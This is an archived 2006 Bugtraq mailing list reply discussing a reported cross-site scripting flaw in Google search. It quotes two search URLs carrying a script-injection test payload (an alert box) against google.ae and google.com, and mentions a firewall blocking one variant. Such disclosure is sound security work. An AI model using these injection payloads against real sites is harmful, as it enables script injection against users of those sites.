Bugtraq mailing list archives

RE: google xss


From: "Andy Meyers" <andy.meyers () hushmail com>
Date: Sun, 9 Apr 2006 16:50:27 -0700

My BlackICE stops this from XSS from happening, however changing the URL
from a .ae domain to a .com and leaving the rest in tact, I am then
prompted.

http://www.google.com/search?hl=ar&q=<script>alert("1")</script>&meta= 

Ashes

-----Original Message-----
From: almfnod () gawab com [mailto:almfnod () gawab com] 
Sent: Tuesday, April 04, 2006 2:35 PM
To: bugtraq () securityfocus com
Subject: google xss

http://www.google.ae/search?hl=ar&q=<script>alert("1")</script>&meta=




Current thread: